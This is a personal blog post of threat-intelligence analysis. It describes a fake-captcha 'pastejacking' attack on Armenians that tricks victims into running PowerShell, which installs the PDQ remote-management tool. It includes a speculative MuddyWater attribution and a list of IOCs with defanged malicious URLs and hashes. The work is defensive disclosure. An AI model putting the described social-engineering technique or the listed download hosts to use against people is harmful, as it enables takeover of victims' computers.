Something phishy is happening in Armenia

Hi all, long time I have not written here a post, this is because I usually share my short findings on Twitter or in-depth analysis for the company I work for.

However, I often encounter some data that is uncertain and causes musings.

Since no one wants to hire me as a full time threat intelligence I decided to share those musings with the community as it might help others to better understand some threats.

Due to the fact this is my personal blog, I will not use a strict structure of a report.

Instead I will start with a freestyle analysis of an interesting attack I have spotted targeting Armenians, after it I will write my musings as this attack might or might not be related to a known threat actor named MuddyWater.

Initial vector - benign office document:

I have found a minimal and benign word document written in Armenian which contains a link at the bottom:


If we click on the link, a browser window will open the URL which displays a captcha message in Armenian:



If we click on the checkbox to solve the captcha a pop-up will appear with instructions in Armenian, below is translated version:




If this is the first time you encounter such captcha challenge, don't be alarmed, this is a fake captcha attack technique called "pastejacking".

How it works - PasteJacking?

If you click on confirm, it should copy for you the fake confirmation text "✅ "I am not a robot - reCAPTCHA Verification ID: XXXXX"
However, the instruction also tell to click a combination of keys, "Windows + R" will open windows run box.
Pressing "Ctrl + V" will paste the copied text, but does it all it does?
The trick here is that the fake captcha takes exactly the whole blank space in the run window for the command.
If you move left to the beginning, you will see that there is additional text before the fake captcha:


Overall, this is a nice social engineering trick that would work for people that are not tech-savvy.
This PasteJacking technique is not new, however recently it caught some new attention.
Furthermore, if you prefer someone speak about it, John Hammond also have a video explaining a different PasteJacking attack a month ago.
Perhaps the attackers watch his videos :)

What does it do? - Install RMM:


Below is the full text that is being copied:



Whoever fallen to this social engineering trick will actually won't be solving any captcha; instead, they will execute powershell that will download and execute and MSI file from the same domain this fake captcha is located.
The verification ID and the filename that is saved to disk is random every time the page loads.
Before the fake captcha text there is the symbol # (hashtag) which is the sign for a comment in powershell, so all that text is not used for anything except the social engineering.
The downloaded MSI is an installer for PDQ remote management system (RMM) which is what the boys in the underground call a free and FUD (fully undetected) RAT (remote access tool).
This allows the attackers to take over the infected computer by abusing a legitimate software.

Well, that was fun... now what? - Attribution Musings:

Most people at this point would either look for IOCs or the more sophisticated for TTPs to check their networks against this or similar threats.
I however, like at this point to understand who is behind the attack.
In many cases, it is not easy to determine who is behind the attack, it is also applies to this case.
However, I do have some thoughts I like to share and perhaps some other researchers observed very similar attacks that can be linked to this one.

Attribution challenges:

The attackers did not use any malicious file in the attack, they abused a legitimate RMM which other attackers can use as well.
I don't know how the benign word document was sent, perhaps an email, but this might not be enough info to correlate to anything concrete.
This pastejacking technique is not new and other attackers are also currently using it.
The domain the attackers used is behind cloudflare.
I have found only a single such unique pastejacking attack.

Yes, But... :

Not that many attackers use PDQ RMM.
The attackers used Armenian language instead of English, cyber-criminals would have used English for higher success, using specifically Armenian is very targeted.
Furthermore the domain used in this attack impersonates the legitimate domain of the Armenian Police - https://police.am/
I have found only a single such unique pastejacking attack.

Into the rabbit hole:

I have taken a closer look at the captcha HTML source code and found some interesting things.
It looks like the attacker saved a page from the Armenian Police website as a baseline:


The attackers modified John Hammond's open source pastejacking kit from Github to Armenian:



The attackers specifically added code to check whether those trying to view the captcha page are using windows, as this method only works on windows...




The attackers also changed the payload from MSHTA to PowerShell, this info will be important soon...

All the above makes it a very targeted and some will even say sophisticated or advanced attack.
Others might say this is a nice internal red team engagement.
Both might be true as we don't have all the necessary facts yet.

Since I have never worked in a professional threat intelligence company, I have no idea how attribution is exactly done, but I heard some people basically throw the TTPs into the MITRE ATT&CK, the more, the merrier as afterwards you should have only one threat actor that fit all the TTPs.
Basically, if it walks like a duck and quacks like a duck, it is a duck...

I highly don't recommend this method for many reasons, but I will use it anyway just to prove my point,  or not...

Although my capabilities are limited as an individual, I did encounter another case or PDQ RMM used by attackers in Armenia a month ago:



In this instance, PDQ RMM was hosted on what appears to be a legitimate compromised Armenian website.
At that time, I suspected that MuddyWater is behind the attack, an Iranian APT, this is because Armenia has been previously targeted by Iranian APTs and MuddyWater has started using PDQ RMM at that time.
However, using compromised web-hosting is not exactly MuddyWater's usual TTP, they opt to abuse free web-hosting, perhaps I was wrong in my assessment and the Armenian website compromise is not related to MuddyWater.

Having said that, 2 incidents involving PDQ RMM in Armenia in a time frame of a month does not sound like a coincidence.

Social engineering is the main attack vector of MuddyWater.
MuddyWater which is also known as Static Kitten, because their TTPs are mostly static, does change their TTPs slightly; Usually by changing the free web-hosting or changing the free RMM they abuse.
In this essence, the captcha attack might be a new social engineering method from MuddyWater.
MuddyWater is also known to use open-source tools, in this case the "captha kit".
Another staple TTP of MuddyWater is using PowerShell, and the kit's payload was specifically changed from MSHTA to PowerShell...

So we certainly do have overlap in TTPs, it walks like Muddy and quacks like Muddy, but is it Muddy?
I am personally not sure because this new activity is just a single point, not even a cluster of activity, so although it perfectly fits the "Square Hole" it might fit other holes as well...

Alright, so far I was only talking about technical TTPs, real threat intel is also done by linguistic experts that might say the Armenian is wrong and it is clearly someone using past or present tense which is only known be used in entirely different language... or simply a ChatGPT F*-up.
As you might notice I am not a language expert and not a Geo-political expert, however I know how to use Google and ask the right questions, for example, who is that person that was mentioned in the initial benign word document? Bagrat Galstanyan
Both "Bagrat" and the Armenian economy are hot topics that might create instability in the country, Iran is known to interfere with other countries to create in them instability for their profit, but take this with a grain of salt as I am not a expert in this domain.

So if we summarize it all and simplify it to this scheme from Mandiant, which are known TI experts, we can see if the analysis sticks and holds:


From tactical perspective we are either in a pickle or straight golden.
Malware? what malware, the attackers abused PDQ RMM, however if we go up in the pyramid of pain, the tools and technique do match those of MuddyWater.
We do have some issue with the infrastructure, but once again, attackers adapt and so should threat intelligence experts and defenders.

From Operational perspective, Armenians are being targeted with lures of ongoing political and economical challenges that might create instability in the country. While this is not much, this is something, Mandiant probably chose a pyramid figure on purpose, as going higher up in the pyramid is more challenging.

From Strategic perspective, this once again perfectly fits Iranian APTs, specifically MuddyWater.
But as I mentioned earlier, take everything with a grain of salt, "if it fits, it sits" might apply to kittens, but maybe there is some copycat throwing false flags? Let's wait for the experts to shed some additional light, or not... as there is much more undocumented attacks than those that have been publicly attributed.

IOC Description
fec64dd6eb25bdc32a1125753ed9f17b4d27f3115a1c48d794cdd385b121417a Sha256 hash of a benign docx document with a link
police-am[.]info/news/view/galstanyan151026.html URL link inside the docx document hosting the recaptcha kit
dcb5fbd24b219eb6ed9ddedffc93ad34c0b498e14bdcdc933d08535659cbca51 Sha256 hash of the modified re-captcha kit
police-am[.]info/i.msi URL containing PDQ RMM
96f5bb770d363c54d6657b877c16e7559ba7cc6341f084fee64166b7760a8572 Sha256 of PDQ RMM from police-am[.]info
armenianeconomy[.]com/Desktop_app.zip URL containing ZIP with PDQ RMM
4da4da7034d90ac233918d6f852cc40866ad7d1279ca872a6d92859b0fc22f76 Sha256 of PDQ RMM from armenianeconomy[.]com







Comments

Popular Posts